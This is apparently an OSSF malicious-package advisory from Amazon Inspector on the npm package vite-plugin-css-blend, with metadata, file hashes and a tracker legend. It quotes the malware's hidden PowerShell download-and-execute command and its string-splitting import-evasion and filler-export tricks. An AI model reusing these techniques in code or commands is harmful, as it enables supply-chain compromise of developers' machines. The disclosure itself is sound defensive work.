MAL-2026-4706
Vulnerability from ossf_malicious_packages
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (7a47fa75fbd028d1aca89ca790036f760c76d8e486175505ef4a8f59f33e7c76)
The package is published as a Vite CSS plugin but exposes no Vite plugin API. Its documented applyGlobalStyles({palette, accents}) export, when called on Windows, treats the caller-supplied accents and palette strings as an AES-256-CBC IV and ciphertext, decrypts them with a hardcoded key, and spawns powershell.exe -WindowStyle Hidden -NoProfile -Command "irm <decrypted-url> -o $env:TEMP\s.js; node $env:TEMP\s.js" — fetching and executing an attacker-controlled JavaScript payload via Node. The node:crypto and node:child_process modules are imported via string-array join (["no","de",":","cry","pto"].join(""), ["no","de",":","chi","ld","_pro","cess"].join("")) to evade static import detection. The package further ships ~200 numbered no-op exports (e.g., isWithinBoundary1..200, applyPreset1..150, createSequenceStep1..250) as filler to camouflage the malicious export among legitimate-looking utilities, and its name baits developers searching the Vite ecosystem. Any consumer following the documented API on a Windows host triggers download-and-execute of arbitrary remote code.
- CWE-506 - The product contains code that appears to be malicious in nature.
{
"affected": [
{
"database_specific": {
"cwes": [
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
],
"indicators": {
"evidence_files": [
{
"path": "dist/index.js",
"sha256": "e8113412636bd5c602bc9cdd9f4f989947d8271899da7963a0411830b966f1ad",
"tlsh": "e9c3ffcab1a23132d32b686048bf018bf377dda0177e4481d159a2adb63441ea5b7f7d"
},
{
"path": "package.json",
"sha256": "adb2dcdf06ad36894d9eb5eac3659a71a1a05c4fcb4636743b28c552d2437b95",
"tlsh": "32012b308520482307d90573aca81643aaa58d6f5644bc08379e402c4bde6ab41fe77d"
}
],
"package_integrity": [
{
"filename": "vite-plugin-css-blend-1.0.0.tgz",
"hashes": {
"sha1": "ba0320dec92a685a5a9ab6c00b33002cca7dba9f",
"sha512_sri": "sha512-jS+E8kmq4UNZjCMf3vl7zW7oAuFs1Ii0gftpuMnCJJ5n2Qm2xLUUEnkY0SxWY7/CFWwYlYSDC3oOh9b/cwTQDw=="
}
}
]
}
},
"package": {
"ecosystem": "npm",
"name": "vite-plugin-css-blend"
},
"versions": [
"1.0.0"
]
}
],
"credits": [
{
"contact": [
"actran@amazon.com"
],
"name": "Amazon Inspector",
"type": "FINDER"
}
],
"database_specific": {
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-004520",
"import_time": "2026-05-26T05:52:45.958440733Z",
"modified_time": "2026-05-24T17:15:49Z",
"sha256": "7a47fa75fbd028d1aca89ca790036f760c76d8e486175505ef4a8f59f33e7c76",
"source": "amazon-inspector",
"versions": [
"1.0.0"
]
}
]
},
"details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (7a47fa75fbd028d1aca89ca790036f760c76d8e486175505ef4a8f59f33e7c76)\nThe package is published as a Vite CSS plugin but exposes no Vite plugin API. Its documented `applyGlobalStyles({palette, accents})` export, when called on Windows, treats the caller-supplied `accents` and `palette` strings as an AES-256-CBC IV and ciphertext, decrypts them with a hardcoded key, and spawns `powershell.exe -WindowStyle Hidden -NoProfile -Command \"irm \u003cdecrypted-url\u003e -o $env:TEMP\\s.js; node $env:TEMP\\s.js\"` \u2014 fetching and executing an attacker-controlled JavaScript payload via Node. The `node:crypto` and `node:child_process` modules are imported via string-array join (`[\"no\",\"de\",\":\",\"cry\",\"pto\"].join(\"\")`, `[\"no\",\"de\",\":\",\"chi\",\"ld\",\"_pro\",\"cess\"].join(\"\")`) to evade static import detection. The package further ships ~200 numbered no-op exports (e.g., `isWithinBoundary1..200`, `applyPreset1..150`, `createSequenceStep1..250`) as filler to camouflage the malicious export among legitimate-looking utilities, and its name baits developers searching the Vite ecosystem. Any consumer following the documented API on a Windows host triggers download-and-execute of arbitrary remote code.\n",
"id": "MAL-2026-4706",
"modified": "2026-05-24T17:15:49Z",
"published": "2026-05-24T17:15:49Z",
"references": [
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/vite-plugin-css-blend/v/1.0.0"
}
],
"schema_version": "1.7.4",
"summary": "Malicious code in vite-plugin-css-blend (npm)"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.